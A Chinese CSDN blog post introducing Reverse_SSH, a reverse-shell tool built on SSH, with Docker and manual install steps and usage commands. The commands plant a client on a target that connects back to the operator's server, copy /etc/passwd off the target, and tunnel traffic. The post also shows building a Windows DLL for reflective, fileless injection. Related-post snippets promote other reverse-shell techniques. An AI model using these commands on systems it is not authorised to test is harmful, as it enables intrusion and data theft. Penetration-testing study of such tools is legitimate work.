一款基于SSH的反向Shell工具

最新推荐文章于 2024-06-15 11:43:50 发布
最新推荐文章于 2024-06-15 11:43:50 发布
阅读量643 收藏
点赞数
分类专栏: 极客工具 文章标签: ssh linux 服务器 shell 转发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014374009/article/details/128542414
版权
Reverse_SSH是一款利用SSH协议实现反向Shell的工具,支持动态、本地和远程转发,提供原生SCP和SFTP功能。用户可以通过Docker或手动方式安装,适用于Linux和Windows环境,还可设置默认服务器、生成WindowsDLL以及利用webhook功能发送HTTP请求。
摘要由CSDN通过智能技术生成

一款基于SSH的反向Shell工具。

Reverse_SSH上一款基于SSH的反向Shell工具,在该工具的帮助下,广大研究人员可以使用SSH来实现反向Shell,并同时拥有下列功能:

1、使用原生SSH语句管理和连接反向Shell;

2、动态、本地和远程转发;

3、原生SCP和SFTP实现,用于从目标获取文件;

4、完整功能的Windows Shell;

5、实现了客户端&服务器端身份验证,以创建高信任高可用的控制通道;

6、其他…

工具架构

在这里插入图片描述

工具安装

Docker安装

docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your_external_address>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v data:/data reversessh/reverse_ssh

手动安装

git clone https://github.com/NHAS/reverse_ssh

cd reverse_ssh

make

cd bin/

运行下列命令后即可启动服务器:

cp ~/.ssh/id_ed25519.pub authorized_keys

./server 0.0.0.0:3232

工具运行

将客户端拷贝到目标设备中,然后让客户端连接服务器:

./client your.rssh.server.com:3232

获取工具帮助信息:

ssh your.rssh.server.com -p 3232 help

查看客户端:

ssh your.rssh.server.com -p 3232 ls -t

连接到完整Shell:

ssh -J your.rssh.server.com:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac

或直接使用主机名连接:

ssh -J your.rssh.server.com:3232 root.wombo

接下来,可以开启远程转发功能:

ssh -R 1234:localhost:1234 -J your.rssh.server.com:3232 root.wombo

或开启动态转发:

ssh -D 9050 -J your.rssh.server.com:3232 root.wombo

SCP:

scp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .

SFTP:

sftp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .

其他功能

默认服务器

可以在项目构建的时候指定一个默认服务器:

$ RSSH_HOMESERVER=your.rssh.server.com:3232 make

$ bin/client

$ bin/client example.com:3232

Windows DLL生成

我们还可以将客户端编译成DLL,并使用类似Invoke-ReflectivePEInjection之类的工具进行加载。此时,如果你使用的是Linux系统,可以使用mingw-w64-gcc编译器:

CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1
.1:2343 make client_dll

当RSSH服务器启用了Webserver之后,我们也可以使用下列命令进行编译:

./server --webserver :3232

ssh your.rssh.server.com -p 3232

catcher$ link --name windows_dll --shared-object --goos windows

http://your.rssh.server.com:3232/windows_dll

这种情况适用于无文件注入的场景。

Webhook

RSSH服务器可以通过命令行终端接口并使用webhook命令发送原始HTTP请求。

首先,启用一个webhook:

$ ssh your.rssh.server.com -p 3232

catcher$ webhook --on http://localhost:8080/

接下来,连接客户端,并使用下列格式发送一个POST请求:

$ nc -l -p 8080

POST /rssh_webhook HTTP/1.1

Host: localhost:8080

User-Agent: Go-http-client/1.1

Content-Length: 165

Content-Type: application/json

Accept-Encoding: gzip

 

{"Status":"connected","ID":"ae92b6535a30566cbae122ebb2a5e754dd58f0ca","IP":"[::1]:52608","HostName":"user.computer","Timestamp":"2022-06-12T12:23:40.626775318+12:00"}%

项目地址

Reverse_SSH:https://github.com/NHAS/reverse_ssh

代码讲故事
关注
专栏目录
rssh:通过SSH反向Shell
05-03
该程序是基于SSH的简单反向Shell。 本质上,它通过SSH打开与远程计算机的连接,开始侦听远程计算机上的端口,并且在与该端口建立连接后,在本地启动命令并向其复制数据。 为什么? 在您无法在本地计算机上侦听...
黑客零基础第一章--反向shell
ShadowBlade
08-09 4996
一篇文章叫你完全掌握反向shell
Shells:一款功能强大的反向Shell快速生成工具
FreeBuf_的博客
12-16 519
Shells是一款功能强大的反向Shell快速生成工具,该工具由4ndr34z负责开发和维护,可以帮助广大研究人员轻松生成常用的反向Shell
Supershell 一款牛叉闪闪的工具
leah126的博客
04-19 3567
在常规渗透测试和比赛中,反弹shell时是否在为Ctrl + C意外关闭Shell而发愁?是否在为执行一些交互式脚本而苦恼?常规的反弹Shell往往只是命令的执行和结果的响应,这样的Shell通常缺少便利的功能,例如完全交互式访问、TAB补全、交互程序的执行和历史记录等功能。
Hershell:跨平台反向Shell生成器
weixin_43977912的博客
04-29 283
Hershell一款功能强大的跨平台反向Shell生成器,该工具使用Go语言开发,基于TCP反向Shell实现其功能。 该工具使用了TLS来保障数据通讯的安全性,并且提供了证书公共密钥指纹绑定功能来防止通信数据被拦截。 支持的系统 Hershell的当前版本支持以下操作系统: Windows Linux macOS FreeBSD 开发目的 虽然Meterpreter Payload有时也能用,但是这种方法很容易被反病毒产品检测到。因此,Hershell便应运而生,它可以给我们提供一个基于TCP的反向Sh
反向shell实操
TingSty小z的博客
02-25 4783
实验一: A机器传递信息到B机器: 测试环境macOS 10.15 1、A用nc命令 listen本机一个端口号 nc -l 8000 2、B 用telnet命令 去连接A机器的ip和端口号 telnet ipA 8000 3、显示连接成功后,B机器可以输入文本,文本会传输到A机器上。实现B-》A的信息传输 telnet的退出 ctrl+] 实验二: 反向shell,A机器控制B机器 一种方式是ssh 登录到B机器上,这种属于正向Shell,A主动连接B,然后控制B; 另一种方式:方向shell,B
SSH Unix Secure Shell工具
06-10
总的来说,SSH Unix Secure Shell工具是Unix环境中不可或缺的工具,它提供了一种安全、可靠的方式来管理和控制远程系统,同时也为数据传输提供了保障。理解并熟练使用SSH是每个系统管理员的基本技能。
tunnelme:反向 SSHSSH 隧道
06-13
标题 "tunnelme:反向 SSHSSH 隧道" 涉及到的是一个与网络连接和安全相关的工具或技术,特别是如何利用 SSH(Secure Shell)来创建隧道进行远程访问。SSH 是一种用于安全地远程登录到服务器、执行命令和传输数据...
Reverse_SSH_Shell:用python编写的反向ssh外壳,供渗透测试人员用作Windows上的隐蔽通道
05-03
【Reverse_SSH_Shell】是一种基于Python编程语言的反向SSH外壳工具,它专为渗透测试人员设计,用于在Windows环境中创建隐蔽的通信通道。在网络安全领域,渗透测试是合法地模拟黑客攻击行为,以评估系统和网络的安全...
Linux远程访问工具,支持ssh服务
07-27
8. **高级用法**:SSH还可以与其他命令结合使用,例如`ssh -L`进行端口转发,`ssh -t`在远程服务器上启动一个伪终端,`ssh -R`实现反向端口转发。 了解并熟练掌握这些SSH远程访问的基本概念和技巧,将极大地提高你...
shell反向删除文件
07-28
NULL 博文链接:https://java2mocca.iteye.com/blog/795242
高级黑客技术-5. 反向ShellShell
最新发布
jennycisp的博客
06-15 966
❝本指南提供了多种方法来建立反向Shell,包括使用加密和明文方式,适用于不同的场景和需求。通过这些技术,安全专家和合法授权的渗透测试者可以有效地控制远程系统,进行安全测试和漏洞评估。gs-netcat 提供加密的反向Shell,支持文件传输和管理员登录警报。Bash 和 cURL 方法允许通过简单的命令行工具建立连接。OpenSSL 和 remote.moe 提供了加密通道,增强了数据传输的安全性。
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2081
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
反向shell
m0_52011198的博客
02-20 521
反向shell是从被感染机器上发起一个连接,它提供攻击者shell访问被感染机器的权限。反向shell或者作为一个单独的恶意代码存在,或者作为一个复杂后门程序中的组件而存在。反向shell的工作方式是远程计算机将自己的shell发送给特定的用户,而不是将shell绑定到一个端口上。后者在很多环境中是无法访问的。这样,你就可以对远程服务器执行root命令。
Windows 反弹shell方法
weixin_53747497的博客
07-12 2939
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
shell的正向和反向
qq_46258964的博客
02-05 8797
正向shell反向shell 正向shell:控制端主动发起连接去连接被控制端 反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
内网渗透(二)——连接shell、NC网络数据传输
qq_61562251的博客
12-10 1625
一、连接shellwebshell的定义:web下的执行环境,shell是用于与操作系统进行交互的用户界面在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,比如:硬件设备有防火墙、入侵检测系统、网站防火墙、端口被占用、权限不足等,一旦被防火墙拦截导致打草惊蛇、后期攻击相当繁琐。而被控制端主动向外发送的数据包通常都不会被拦截。二、反向shell1、工具:nc(netcat)nc,也称为netcat,是一款功能强大的网络工具,可以在网络上进行数据传输。
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 3185
详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
Reverse_SSH一款基于SSH反向Shell工具
顶峰
02-10 651
SSH
PuTTY中文教程:SSH与FTP工具详解
PuTTY中文教程是一篇由柴锋在2006年11月撰写的文章,主要针对Windows用户介绍了一款强大的远程终端模拟器,特别是用于SSH(Secure Shell)连接的工具。文章旨在分享作者多年使用PuTTY的经验,并拓展到与其相关的软件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

代码讲故事

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值